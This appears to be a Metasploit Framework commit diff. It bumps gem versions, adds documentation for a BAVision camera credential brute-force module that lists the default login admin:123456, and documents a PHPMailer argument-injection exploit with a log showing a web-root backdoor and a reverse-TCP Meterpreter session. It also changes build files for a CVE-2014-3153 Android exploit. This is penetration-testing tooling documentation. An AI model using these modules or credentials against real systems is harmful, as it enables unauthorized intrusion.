sempervictus
diff --git a/‎Gemfile.lock
Lines changed: 6 additions & 6 deletions b/‎Gemfile.lock
Lines changed: 6 additions & 6 deletions
diff --git a/‎data/exploits/CVE-2014-3153.elf
-17.3 KB b/‎data/exploits/CVE-2014-3153.elf
-17.3 KB
diff --git a/‎data/exploits/CVE-2014-3153.so
29.5 KB b/‎data/exploits/CVE-2014-3153.so
29.5 KB
diff --git a/‎documentation/modules/auxiliary/scanner/http/bavision_cam_login.md
Lines changed: 28 additions & 0 deletions b/‎documentation/modules/auxiliary/scanner/http/bavision_cam_login.md
Lines changed: 28 additions & 0 deletions
diff --git a/‎documentation/modules/exploit/multi/http/phpmailer_arg_injection.md
Lines changed: 79 additions & 0 deletions b/‎documentation/modules/exploit/multi/http/phpmailer_arg_injection.md
Lines changed: 79 additions & 0 deletions
diff --git a/‎external/source/exploits/CVE-2014-3153/Android.mk
Lines changed: 14 additions & 3 deletions b/‎external/source/exploits/CVE-2014-3153/Android.mk
Lines changed: 14 additions & 3 deletions
diff --git a/‎external/source/exploits/CVE-2014-3153/Makefile
Lines changed: 7 additions & 5 deletions b/‎external/source/exploits/CVE-2014-3153/Makefile
Lines changed: 7 additions & 5 deletions
@@ -1,7 +1,7 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (4.13.11)
+    metasploit-framework (4.13.14)
       actionpack (~> 4.2.6)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -16,7 +16,7 @@ PATH
       metasploit-model
       metasploit-payloads (= 1.2.6)
       metasploit_data_models
-      metasploit_payloads-mettle (= 0.1.4)
+      metasploit_payloads-mettle (= 0.1.6)
       msgpack
       nessus_rest
       net-ssh
@@ -180,7 +180,7 @@ GEM
       postgres_ext
       railties (~> 4.2.6)
       recog (~> 2.0)
-    metasploit_payloads-mettle (0.1.4)
+    metasploit_payloads-mettle (0.1.6)
     method_source (0.8.2)
     mime-types (3.1)
       mime-types-data (~> 3.2015)
@@ -192,7 +192,7 @@ GEM
     multi_test (0.1.2)
     multipart-post (2.0.0)
     nessus_rest (0.1.6)
-    net-ssh (4.0.0)
+    net-ssh (4.0.1)
     network_interface (0.0.1)
     nokogiri (1.7.0.1)
       mini_portile2 (~> 2.1.0)
@@ -273,7 +273,7 @@ GEM
       metasm
       rex-core
       rex-text
-    rex-socket (0.1.2)
+    rex-socket (0.1.3)
       rex-core
     rex-sslscan (0.1.1)
       rex-socket
@@ -326,7 +326,7 @@ GEM
     windows_error (0.0.2)
     xpath (2.0.0)
       nokogiri (~> 1.3)
-    yard (0.9.5)
+    yard (0.9.7)
 
 PLATFORMS
   ruby
 
@@ -0,0 +1,28 @@
+This module allows you to log into an BAVision IP Camera's web server.
+
+The instructions shipped with the camera do not mention clearly regarding the existence of the
+lighttpd web server, and it uses admin:123456 as the default credential. Even if the default
+password is changed, the account could also be bruteforced since there is no policy for lockouts.
+
+
+## Vulnerable Application
+
+The web server is built into the IP camera. Specifically, this camera was tested during development:
+
+"BAVISION 1080P HD Wifi Wireless IP Camera Home Security Baby Monitor Spy Pet/Dog Cameras Video Monitoring Plug/Play,Pan/Tilt With Two-Way Audio and Night Vision"
+
+http://goo.gl/pHAqS1
+
+## Verification Steps
+
+  1. Read the instructions that come with the IP camera to set it up
+  2. Find the IP of the camera (in lab, your router should have info about this)
+  3. Do: ```use auxiliary/scanner/http/bavision_cam_login```
+  4. Set usernames and passwords
+  5. Do: ```run```
+
+## Options
+
+  **TRYDEFAULT**
+
+  The ```TRYDEFAULT``` options adds the default credential admin:123456 to the credential list.
@@ -0,0 +1,79 @@
+## Vulnerable Application
+
+PHPMailer versions up to and including [5.2.20](https://github.com/PHPMailer/PHPMailer/archive/v5.2.20.tar.gz) are affected by a vulnerability which can be leveraged by an attacker to
+write a file with partially controlled contents to an arbitrary location through injection of arguments that are passed
+to the sendmail binary. This module writes a payload to the web root of the webserver before then executing it with an
+HTTP request. The user running PHPMailer must have write access to the specified WEB_ROOT directory and successful
+exploitation can take a few minutes.
+
+[5.1.18](https://github.com/PHPMailer/PHPMailer/archive/v5.2.18.tar.gz) is also targetted.
+
+## Verification Steps
+
+  1. Install a vulnerable PHPMailer
+  2. Start msfconsole
+  3. `use exploit/multi/http/phpmailer_arg_injection`
+  4.  Set the TARGETURI and WEB_ROOT options as applicable
+  5. `exploit`
+  6.  Verify the module yields a PHP meterpreter session in < 5 minutes
+  7.  Verify the malicious PHP file was automatically removed
+
+## Scenarios
+
+  Demo taken directly from [PR7768](https://github.com/rapid7/metasploit-framework/pull/7768)
+
+```
+msf (S:0 J:0) exploit(php_mailer) > options
+
+Module options (exploit/linux/http/php_mailer):
+
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOST       192.168.90.134   yes       The target address
+   RPORT       8080             yes       The target port
+   SSL         false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI   /                yes       Path to the application root
+   TRIGGERURI                   no        Path to the uploaded payload
+   VHOST                        no        HTTP server virtual host
+   WEB_ROOT    /www             yes       Path to the web root
+
+
+
+Payload options (php/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.90.134   yes       The listen address
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+
+msf (S:0 J:0) exploit(php_mailer) > rexploit
+[*] Reloading module...
+
+[*] [2016.12.29-17:03:47] Started reverse TCP handler on 192.168.90.134:4444
+[*] [2016.12.29-17:03:47] Writing the backdoor to /www/0IxI5AFB.php
+[*] [2016.12.29-17:04:07] Sleeping before requesting the written file
+[*] [2016.12.29-17:04:07] Waiting for up to 300 seconds to trigger the payload
+[+] [2016.12.29-17:04:48] Successfully found the payload
+[*] [2016.12.29-17:05:50] Sending stage (34122 bytes) to 172.17.0.2
+[*] Meterpreter session 4 opened (192.168.90.134:4444 -> 172.17.0.2:47280) at 2016-12-29 17:05:50 -0500
+[+] [2016.12.29-17:05:50] Deleted /www/0IxI5AFB.php
+[+] [2016.12.29-17:06:10] Successfully triggered the payload
+
+
+meterpreter > sysinfo
+Computer    : 90f0c8e8dbe4
+OS          : Linux 90f0c8e8dbe4 4.8.15-200.fc24.x86_64 #1 SMP Thu Dec 15 23:09:22 UTC 2016 x86_64
+Meterpreter : php/linux
+
+meterpreter >
+```
@@ -3,8 +3,19 @@ LOCAL_PATH := $(call my-dir)
 
 include $(CLEAR_VARS)
 
-LOCAL_MODULE    := exploit
-LOCAL_SRC_FILES := exploit.c
-LOCAL_CFLAGS := -fno-stack-protector -O0
+LOCAL_MODULE    := debugexploit
+LOCAL_SRC_FILES := futex_requeue.c main.c
+LOCAL_LDFLAGS   += -llog
+LOCAL_CFLAGS    += -DDEBUG
+LOCAL_CFLAGS    += -fno-stack-protector -O0
 include $(BUILD_EXECUTABLE)
 
+include $(CLEAR_VARS)
+
+LOCAL_CFLAGS    += -fno-stack-protector -O0
+LOCAL_MODULE    := exploit
+LOCAL_SRC_FILES := futex_requeue.c main.c
+
+include $(BUILD_SHARED_LIBRARY)
+
+
@@ -2,14 +2,16 @@
 all: install
 
 build:
-	ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk
+	ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=armeabi
 
 install: build
-	mv libs/armeabi/exploit ../../../../data/exploits/CVE-2014-3153.elf
+	mv libs/armeabi/libexploit.so ../../../../data/exploits/CVE-2014-3153.so
 
-test: build
-	adb push libs/armeabi/exploit /data/local/tmp/exploit
-	adb shell "cd /data/local/tmp; ./exploit id"
+push: build
+	adb push libs/armeabi/debugexploit /data/local/tmp/futex
+
+run: push
+	adb shell "/data/local/tmp/futex"
 
 clean:
 	rm -rf libs